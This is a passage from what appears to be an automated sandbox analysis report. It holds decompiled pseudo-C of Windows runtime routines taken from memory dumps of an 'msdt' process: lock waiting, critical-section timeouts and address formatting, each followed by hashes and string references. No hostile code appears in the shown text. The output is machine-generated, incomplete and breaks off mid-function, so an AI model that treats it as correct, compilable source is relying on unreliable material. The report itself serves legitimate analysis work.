                                                                    										if(_t93 > 0) {
                                                                    											continue;
                                                                    										}
                                                                    										break;
                                                                    									}
                                                                    									__eflags = _t106;
                                                                    								}
                                                                    								if(__eflags != 0) {
                                                                    									continue;
                                                                    								} else {
                                                                    									goto L23;
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    						goto L58;
                                                                    					}
                                                                    					_t84 = _t115;
                                                                    					asm("lock cmpxchg [esi], ecx");
                                                                    					__eflags = _t84 - _t115;
                                                                    					if(_t84 != _t115) {
                                                                    						_t115 = _t84;
                                                                    						goto L7;
                                                                    					} else {
                                                                    						return 1;
                                                                    					}
                                                                    				}
                                                                    				L58:
                                                                    			}

                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 025F2206
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                    • API String ID: 885266447-4236105082
                                                                    • Opcode ID: 34d857a008bc043c351624942ec6ccef10ec937c3e465678f12fc91d82bb82b6
                                                                    • Instruction ID: e559f2022885c17d6733b422d06019f28312ce942c3b0d09baf0c36be4b6b020
                                                                    • Opcode Fuzzy Hash: 34d857a008bc043c351624942ec6ccef10ec937c3e465678f12fc91d82bb82b6
                                                                    • Instruction Fuzzy Hash: A6514E717002026FEF54CE18CC81F6637AABFC4724F214259ED59DB284EA71EC418B9C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 64%
                                                                    			E025D14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                    				signed int _v8;
                                                                    				char _v10;
                                                                    				char _v140;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t24;
                                                                    				void* _t26;
                                                                    				signed int _t29;
                                                                    				signed int _t34;
                                                                    				signed int _t40;
                                                                    				intOrPtr _t45;
                                                                    				void* _t51;
                                                                    				intOrPtr* _t52;
                                                                    				void* _t54;
                                                                    				signed int _t57;
                                                                    				void* _t58;
                                                                    
                                                                    				_t51 = __edx;
                                                                    				_t24 =  *0x2672088; // 0x762a3ac1
                                                                    				_v8 = _t24 ^ _t57;
                                                                    				_t45 = _a16;
                                                                    				_t53 = _a4;
                                                                    				_t52 = _a20;
                                                                    				if(_a4 == 0 || _t52 == 0) {
                                                                    					L10:
                                                                    					_t26 = 0xc000000d;
                                                                    				} else {
                                                                    					if(_t45 == 0) {
                                                                    						if( *_t52 == _t45) {
                                                                    							goto L3;
                                                                    						} else {
                                                                    							goto L10;
                                                                    						}
                                                                    					} else {
                                                                    						L3:
                                                                    						_t28 =  &_v140;
                                                                    						if(_a12 != 0) {
                                                                    							_push("[");
                                                                    							_push(0x41);
                                                                    							_push( &_v140);
                                                                    							_t29 = E025C7707();
                                                                    							_t58 = _t58 + 0xc;
                                                                    							_t28 = _t57 + _t29 * 2 - 0x88;
                                                                    						}
                                                                    						_t54 = E025D13CB(_t53, _t28);
                                                                    						if(_a8 != 0) {
                                                                    							_t34 = E025C7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                                    							_t58 = _t58 + 0x10;
                                                                    							_t54 = _t54 + _t34 * 2;
                                                                    						}
                                                                    						if(_a12 != 0) {
                                                                    							_t40 = E025C7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                                    							_t58 = _t58 + 0x10;
                                                                    							_t54 = _t54 + _t40 * 2;
                                                                    						}
                                                                    						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                                    						 *_t52 = _t53;
                                                                    						if( *_t52 < _t53) {
                                                                    							goto L10;
                                                                    						} else {
                                                                    							E02592340(_t45,  &_v140, _t53 + _t53);
                                                                    							_t26 = 0;
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				return E0259E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                                    			}
                                                                    0x025d1517
                                                                    0x025d156d
                                                                    0x025d1572
                                                                    0x025d1575
                                                                    0x025d1575
                                                                    0x025d151e
                                                                    0x025fea50
                                                                    0x025fea55
                                                                    0x025fea58
                                                                    0x025fea58
                                                                    0x025d152e
                                                                    0x025d1531
                                                                    0x025d1533
                                                                    0x00000000
                                                                    0x025d1535
                                                                    0x025d1541
                                                                    0x025d1549
                                                                    0x025d1549
                                                                    0x025d1533
                                                                    0x025d14f3
                                                                    0x025d1559

                                                                    APIs
                                                                    • ___swprintf_l.LIBCMT ref: 025FEA22
                                                                      • Part of subcall function 025D13CB: ___swprintf_l.LIBCMT ref: 025D146B
                                                                      • Part of subcall function 025D13CB: ___swprintf_l.LIBCMT ref: 025D1490
                                                                    • ___swprintf_l.LIBCMT ref: 025D156D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
• Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp
• Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp
• Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp
• Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp
• Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp
• Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp
• Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: %%%u$]:%u
                                                                    • API String ID: 48624451-3050659472
                                                                    • Opcode ID: ee6e0eabb585a7e7fd355566485fb69e845862663ec02d387f8fa22f1c312fa7
                                                                    • Instruction ID: a9bc11d2ca549dc150ee0cb901926fcf7bdb088ca6e9439160f7912521eb5c13
                                                                    • Opcode Fuzzy Hash: ee6e0eabb585a7e7fd355566485fb69e845862663ec02d387f8fa22f1c312fa7
                                                                    • Instruction Fuzzy Hash: B421E372900619ABDF30DE68CC41AEE77ACBB54300F448426ED4AD3100EB75AE58CFE8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 44%
                                                                    			E025B53A5(signed int _a4, char _a8) {
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t32;
                                                                    				signed int _t37;
                                                                    				signed int _t40;
                                                                    				signed int _t42;
                                                                    				void* _t45;
                                                                    				intOrPtr _t46;
                                                                    				signed int _t49;
                                                                    				void* _t51;
                                                                    				signed int _t57;
                                                                    				signed int _t64;
                                                                    				signed int _t71;
                                                                    				void* _t74;
                                                                    				intOrPtr _t78;
                                                                    				signed int* _t79;
                                                                    				void* _t85;
                                                                    				signed int _t86;
                                                                    				signed int _t92;
                                                                    				void* _t104;
                                                                    				void* _t105;
                                                                    
                                                                    				_t64 = _a4;
                                                                    				_t32 =  *(_t64 + 0x28);
                                                                    				_t71 = _t64 + 0x28;
                                                                    				_push(_t92);
                                                                    				if(_t32 < 0) {
                                                                    					_t78 =  *[fs:0x18];
                                                                    					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                                    					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                                    						goto L3;
                                                                    					} else {
                                                                    						__eflags = _t32 | 0xffffffff;
                                                                    						asm("lock xadd [ecx], eax");
                                                                    						return 1;
                                                                    					}
                                                                    				} else {
                                                                    					L3:
                                                                    					_push(_t86);
                                                                    					while(1) {
                                                                    						L4:
                                                                    						__eflags = _t32;
                                                                    						if(_t32 == 0) {
                                                                    							break;
                                                                    						}
                                                                    						__eflags = _a8;
                                                                    						if(_a8 == 0) {
                                                                    							__eflags = 0;
                                                                    							return 0;
                                                                    						} else {
                                                                    							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                                    							_t79 = _t64 + 0x24;
                                                                    							_t71 = 1;
                                                                    							asm("lock xadd [eax], ecx");
                                                                    							_t32 =  *(_t64 + 0x28);
                                                                    							_a4 = _t32;
                                                                    							__eflags = _t32;
                                                                    							if(_t32 != 0) {
                                                                    								L19:
                                                                    								_t86 = 0;
                                                                    								__eflags = 0;
                                                                    								while(1) {
                                                                    									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                                    									asm("sbb esi, esi");
                                                                    									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x026701c0;
                                                                    									_push(_t92);
                                                                    									_push(0);
                                                                    									_t37 = E0258F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                                    									__eflags = _t37 - 0x102;
                                                                    									if(_t37 != 0x102) {
                                                                    										break;
                                                                    									}
                                                                    									_t71 =  *(_t92 + 4);
                                                                    									_t85 =  *_t92;
                                                                    									_t51 = E025D4FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                                    									_push(_t85);
                                                                    									_push(_t51);
                                                                    									E025E3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                                    									E025E3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                                    									_t86 = _t86 + 1;
                                                                    									_t105 = _t104 + 0x28;
                                                                    									__eflags = _t86 - 2;
                                                                    									if(__eflags > 0) {
                                                                    										E0261217A(_t71, __eflags, _t64);
                                                                    									}
                                                                    									_push("RTL: Re-Waiting\n");
                                                                    									_push(0);
                                                                    									_push(0x65);
                                                                    									E025E3F92();
                                                                    									_t104 = _t105 + 0xc;
                                                                    								}
                                                                    								__eflags = _t37;
                                                                    								if(__eflags < 0) {
                                                                    									_push(_t37);
                                                                    									E025D3915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                                    									asm("int3");
                                                                    									_t40 =  *_t71;
                                                                    									 *_t71 = 0;
                                                                    									__eflags = _t40;
                                                                    									if(_t40 == 0) {
                                                                    										L1:
                                                                    										_t42 = E025B5384(_t92 + 0x24);
                                                                    										if(_t42 != 0) {
                                                                    											goto L31;
                                                                    										} else {
                                                                    											goto L2;
                                                                    										}
                                                                    									} else {
                                                                    										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                                    										_push( &_a4);
                                                                    										_push(_t40);
                                                                    										_t49 = E0258F970( *((intOrPtr*)(_t92 + 0x18)));
                                                                    										__eflags = _t49;
                                                                    										if(__eflags >= 0) {
                                                                    											goto L1;
                                                                    										} else {
                                                                    											_push(_t49);
                                                                    											E025D3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                                    											L31:
                                                                    											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                                    											_push( &_a4);
                                                                    											_push(1);
                                                                    											_t42 = E0258F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                    											__eflags = _t42;
                                                                    											if(__eflags >= 0) {
                                                                    												L2:
                                                                    												return _t42;
                                                                    											} else {
                                                                    												_push(_t42);
                                                                    												E025D3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                                    												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                                    												_push( &_a4);
                                                                    												_push(1);
                                                                    												_t42 = E0258F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                    												__eflags = _t42;
                                                                    												if(__eflags >= 0) {
                                                                    													goto L2;
                                                                    												} else {
                                                                    													_push(_t42);
                                                                    													_t45 = E025D3915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                                    													asm("int3");
                                                                    													while(1) {
                                                                    														_t74 = _t45;
                                                                    														__eflags = _t45 - 1;
                                                                    														if(_t45 != 1) {
                                                                    															break;
                                                                    														}
                                                                    														_t86 = _t86 | 0xffffffff;
                                                                    														_t45 = _t74;
                                                                    														asm("lock cmpxchg [ebx], edi");
                                                                    														__eflags = _t45 - _t74;
                                                                    														if(_t45 != _t74) {
                                                                    															continue;
                                                                    														} else {
                                                                    															_t46 =  *[fs:0x18];
                                                                    															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                                    															return _t46;
                                                                    														}
                                                                    														goto L37;
                                                                    													}
                                                                    													E025B5329(_t74, _t92);
                                                                    													_push(1);
                                                                    													return E025B53A5(_t92);
                                                                    												}
                                                                    											}
                                                                    										}
                                                                    									}
                                                                    								} else {
                                                                    									_t32 =  *(_t64 + 0x28);
                                                                    									continue;
                                                                    								}
                                                                    							} else {
                                                                    								_t71 =  *_t79;
                                                                    								__eflags = _t71;
                                                                    								if(__eflags > 0) {
                                                                    									while(1) {
                                                                    										_t57 = _t71;
                                                                    										asm("lock cmpxchg [edi], esi");
                                                                    										__eflags = _t57 - _t71;
                                                                    										if(_t57 == _t71) {
                                                                    											break;
                                                                    										}
                                                                    										_t71 = _t57;
                                                                    										__eflags = _t57;
                                                                    										if(_t57 > 0) {
                                                                    											continue;
                                                                    										}
                                                                    										break;
                                                                    									}
                                                                    									_t32 = _a4;
                                                                    									__eflags = _t71;
                                                                    								}
                                                                    								if(__eflags != 0) {
                                                                    									continue;
                                                                    								} else {
                                                                    									goto L19;
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    						goto L37;
                                                                    					}
                                                                    					_t71 = _t71 | 0xffffffff;
                                                                    					_t32 = 0;
                                                                    					asm("lock cmpxchg [edx], ecx");
                                                                    					__eflags = 0;
                                                                    					if(0 != 0) {
                                                                    						goto L4;
                                                                    					} else {
                                                                    						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                    						return 1;
                                                                    					}
                                                                    				}
                                                                    				L37:
                                                                    			}
                                                                    0x025b53ab
                                                                    0x025b53ae
                                                                    0x025b53b1
                                                                    0x025b53b4
                                                                    0x025b53b7
                                                                    0x025d05b6
                                                                    0x025d05c0
                                                                    0x025d05c3
                                                                    0x00000000
                                                                    0x025d05c9
                                                                    0x025d05c9
                                                                    0x025d05cc
                                                                    0x025d05d5
                                                                    0x025d05d5
                                                                    0x025b53bd
                                                                    0x025b53bd
                                                                    0x025b53bd
                                                                    0x025b53be
                                                                    0x025b53be
                                                                    0x025b53be
                                                                    0x025b53c0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025f2269
                                                                    0x025f226d
                                                                    0x025f2349
                                                                    0x025f234d
                                                                    0x025f2273
                                                                    0x025f2276
                                                                    0x025f2279
                                                                    0x025f227e

                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 025F22F4
                                                                    Strings
                                                                    • RTL: Re-Waiting, xrefs: 025F2328
                                                                    • RTL: Resource at %p, xrefs: 025F230B
                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 025F22FC
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                    • API String ID: 885266447-871070163
                                                                    • Opcode ID: e4d12a29f9477b8b42ee75b64bc0176bc2bcb4bcf4a36dd4252c3f151132c5c7
                                                                    • Instruction ID: 007e2638ed58a02b8f00de3d383e54a996029c942ba36c206b65ec32ec6c149f
                                                                    • Opcode Fuzzy Hash: e4d12a29f9477b8b42ee75b64bc0176bc2bcb4bcf4a36dd4252c3f151132c5c7
                                                                    • Instruction Fuzzy Hash: E751F8B16116066BEF15DF68CC80FA67799FF88324F104659FD19DB280F761E8418BA8
                                                                    Uniqueness
                                                                    • Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 51%
                                                                    			E025BEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                    				intOrPtr _v8;
                                                                    				intOrPtr _v12;
                                                                    				signed int _v24;
                                                                    				intOrPtr* _v28;
                                                                    				intOrPtr _v32;
                                                                    				signed int _v36;
                                                                    				intOrPtr _v40;
                                                                    				short _v66;
                                                                    				char _v72;
                                                                    				void* __esi;
                                                                    				intOrPtr _t38;
                                                                    				intOrPtr _t39;
                                                                    				signed int _t40;
                                                                    				intOrPtr _t42;
                                                                    				intOrPtr _t43;
                                                                    				signed int _t44;
                                                                    				void* _t46;
                                                                    				intOrPtr _t48;
                                                                    				signed int _t49;
                                                                    				intOrPtr _t50;
                                                                    				intOrPtr _t53;
                                                                    				signed char _t67;
                                                                    				void* _t72;
                                                                    				intOrPtr _t77;
                                                                    				intOrPtr* _t80;
                                                                    				intOrPtr _t84;
                                                                    				intOrPtr* _t85;
                                                                    				void* _t91;
                                                                    				void* _t92;
                                                                    				void* _t93;
                                                                    
                                                                    				_t80 = __edi;
                                                                    				_t75 = __edx;
                                                                    				_t70 = __ecx;
                                                                    				_t84 = _a4;
                                                                    				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                                    					E025ADA92(__ecx, __edx, __eflags, _t84);
                                                                    					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                                    				}
                                                                    				_push(0);
                                                                    				__eflags = _t38 - 0xffffffff;
                                                                    				if(_t38 == 0xffffffff) {
                                                                    					_t39 =  *0x267793c; // 0x0
                                                                    					_push(0);
                                                                    					_push(_t84);
                                                                    					_t40 = E025916C0(_t39);
                                                                    				} else {
                                                                    					_t40 = E0258F9D4(_t38);
                                                                    				}
                                                                    				_pop(_t85);
                                                                    				__eflags = _t40;
                                                                    				if(__eflags < 0) {
                                                                    					_push(_t40);
                                                                    					E025D3915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                                    					asm("int3");
                                                                    					while(1) {
                                                                    						L21:
                                                                    						_t76 =  *[fs:0x18];
                                                                    						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                    						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                                    						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                                    							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                                    							_v66 = 0x1722;
                                                                    							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                    							_t76 =  &_v72;
                                                                    							_push( &_v72);
                                                                    							_v28 = _t85;
                                                                    							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                                    							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                                    							_push(0x10);
                                                                    							_push(0x20402);
                                                                    							E025901A4( *0x7ffe0382 & 0x000000ff);
                                                                    						}
                                                                    						while(1) {
                                                                    							_t43 = _v8;
                                                                    							_push(_t80);
                                                                    							_push(0);
                                                                    							__eflags = _t43 - 0xffffffff;
                                                                    							if(_t43 == 0xffffffff) {
                                                                    								_t71 =  *0x267793c; // 0x0
                                                                    								_push(_t85);
                                                                    								_t44 = E02591F28(_t71);
                                                                    							} else {
                                                                    								_t44 = E0258F8CC(_t43);
                                                                    							}
                                                                    							__eflags = _t44 - 0x102;
                                                                    							if(_t44 != 0x102) {
                                                                    								__eflags = _t44;
                                                                    								if(__eflags < 0) {
                                                                    									_push(_t44);
                                                                    									E025D3915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                                    									asm("int3");
                                                                    									E02612306(_t85);
                                                                    									__eflags = _t67 & 0x00000002;
                                                                    									if((_t67 & 0x00000002) != 0) {
                                                                    										_t7 = _t67 + 2; // 0x4
                                                                    										_t72 = _t7;
                                                                    										asm("lock cmpxchg [edi], ecx");
                                                                    										__eflags = _t67 - _t67;
                                                                    										if(_t67 == _t67) {
                                                                    											E025BEC56(_t72, _t76, _t80, _t85);
                                                                    										}
                                                                    									}
                                                                    									return 0;
                                                                    								} else {
                                                                    									__eflags = _v24;
                                                                    									if(_v24 != 0) {
                                                                    										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                                    									}
                                                                    									return 2;
                                                                    								}
                                                                    								goto L36;
                                                                    							}
                                                                    							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                                    							_push(_t67);
                                                                    							_t46 = E025D4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                                    							_push(_t77);
                                                                    							E025E3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                                    							_t48 =  *_t85;
                                                                    							_t92 = _t91 + 0x18;
                                                                    							__eflags = _t48 - 0xffffffff;
                                                                    							if(_t48 == 0xffffffff) {
                                                                    								_t49 = 0;
                                                                    								__eflags = 0;
                                                                    							} else {
                                                                    								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                                    							}
                                                                    							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                    							_push(_t49);
                                                                    							_t50 = _v12;
                                                                    							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                                    							_push(_t85);
                                                                    							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                                    							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                                    							E025E3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                                    							_t53 =  *_t85;
                                                                    							_t93 = _t92 + 0x20;
                                                                    							_t67 = _t67 + 1;
                                                                    							__eflags = _t53 - 0xffffffff;
                                                                    							if(_t53 != 0xffffffff) {
                                                                    								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                                    								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                                    							}
                                                                    							__eflags = _t67 - 2;
                                                                    							if(_t67 > 2) {
                                                                    								__eflags = _t85 - 0x26720c0;
                                                                    								if(_t85 != 0x26720c0) {
                                                                    									_t76 = _a4;
                                                                    									__eflags = _a4 - _a8;
                                                                    									if(__eflags == 0) {
                                                                    										E0261217A(_t71, __eflags, _t85);
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    							_push("RTL: Re-Waiting\n");
                                                                    							_push(0);
                                                                    							_push(0x65);
                                                                    							_a8 = _a4;
                                                                    							E025E3F92();
                                                                    							_t91 = _t93 + 0xc;
                                                                    							__eflags =  *0x7ffe0382;
                                                                    							if( *0x7ffe0382 != 0) {
                                                                    								goto L21;
                                                                    							}
                                                                    						}
                                                                    						goto L36;
                                                                    					}
                                                                    				} else {
                                                                    					return _t40;
                                                                    				}
                                                                    				L36:
                                                                    			}

                                                                    0x025beb9f
                                                                    0x025beba2
                                                                    0x025f2465
                                                                    0x025f246b
                                                                    0x025f246d
                                                                    0x025beba8
                                                                    0x025beba9
                                                                    0x025beba9
                                                                    0x025bebae
                                                                    0x025bebb3
                                                                    0x025bebb9
                                                                    0x025bebbb
                                                                    0x025f2513
                                                                    0x025f2514
                                                                    0x025f2519
                                                                    0x025f251b
                                                                    0x025bec2a
                                                                    0x025bec2d
                                                                    0x025bec33
                                                                    0x025bec36
                                                                    0x025bec3a
                                                                    0x025bec3e
                                                                    0x025bec40
                                                                    0x025bec47
                                                                    0x025bec47
                                                                    0x025bec40
                                                                    0x025922c6
                                                                    0x025bebc1
                                                                    0x025bebc1
                                                                    0x025bebc5
                                                                    0x025bec9a
                                                                    0x025bec9a
                                                                    0x025bebd6
                                                                    0x025bebd6
                                                                    0x00000000
                                                                    0x025bebbb
                                                                    0x025f2477
                                                                    0x025f247c
                                                                    0x025f2486
                                                                    0x025f248b
                                                                    0x025f2496
                                                                    0x025f249b
                                                                    0x025f249d
                                                                    0x025f24a0
                                                                    0x025f24a3
                                                                    0x025f24aa
                                                                    0x025f24aa
                                                                    0x025f24a5
                                                                    0x025f24a5
                                                                    0x025f24a5
                                                                    0x025f24ac
                                                                    0x025f24af
                                                                    0x025f24b0
                                                                    0x025f24b3
                                                                    0x025f24b9
                                                                    0x025f24ba
                                                                    0x025f24bb
                                                                    0x025f24c6
                                                                    0x025f24cb
                                                                    0x025f24cd
                                                                    0x025f24d0
                                                                    0x025f24d1
                                                                    0x025f24d4
                                                                    0x025f24d6
                                                                    0x025f24d9
                                                                    0x025f24d9
                                                                    0x025f24dc
                                                                    0x025f24df
                                                                    0x025f24e1
                                                                    0x025f24e7
                                                                    0x025f24e9
                                                                    0x025f24ec
                                                                    0x025f24ef
                                                                    0x025f24f2
                                                                    0x025f24f2
                                                                    0x025f24ef
                                                                    0x025f24e7
                                                                    0x025f24fa
                                                                    0x025f24ff
                                                                    0x025f2501
                                                                    0x025f2503
                                                                    0x025f2506
                                                                    0x025f250b
                                                                    0x025beb8c
                                                                    0x025beb93
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025beb93
                                                                    0x00000000
                                                                    0x025beb99
                                                                    0x025bec85
                                                                    0x025bec85
                                                                    0x025bec85
                                                                    0x00000000

                                                                    Strings
                                                                    • RTL: Re-Waiting, xrefs: 025F24FA
                                                                    • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 025F248D
                                                                    • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 025F24BD
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                    • API String ID: 0-3177188983
                                                                    • Opcode ID: 24b091bd71a486427692f121ee1a3adf808841161547f0f1e85a86502133c496
                                                                    • Instruction ID: 10391aab37d86ac0652d09d32415b239b22b634e75c2ce8edc16df85a81aa95b
                                                                    • Opcode Fuzzy Hash: 24b091bd71a486427692f121ee1a3adf808841161547f0f1e85a86502133c496
                                                                    • Instruction Fuzzy Hash: 0441EDB0600205ABDB24DF64CC89FAA77A9FF84720F148A05F959DB2C0D774E941CB6D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			// Decompiler output. Its control flow (':' and '::' handling, '.' for an embedded dotted-quad,
                                                                    			// hextet count capped at 8, 0xc000000d = STATUS_INVALID_PARAMETER on failure) is consistent
                                                                    			// with an IPv6 string-to-address parser; that reading is an assumption, not confirmed by the report.
                                                                    			E025CFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                                    				signed int _v8;
                                                                    				signed int _v12;
                                                                    				signed int _v16;
                                                                    				signed int _v20;
                                                                    				signed int _v24;
                                                                    				signed int _v28;
                                                                    				signed int _t98;   // used below but left undeclared by the decompiler
                                                                    				signed int _t105;
                                                                    				void* _t110;
                                                                    				char _t114;
                                                                    				short _t115;
                                                                    				void* _t118;
                                                                    				signed short* _t119;
                                                                    				short _t120;
                                                                    				char _t122;
                                                                    				void* _t127;
                                                                    				void* _t130;
                                                                    				signed int _t136;
                                                                    				intOrPtr _t143;
                                                                    				signed int _t158;
                                                                    				signed short* _t164;
                                                                    				signed int _t167;
                                                                    				void* _t170;
                                                                    
                                                                    				_t158 = 0;
                                                                    				_t164 = _a4;
                                                                    				_v20 = 0;
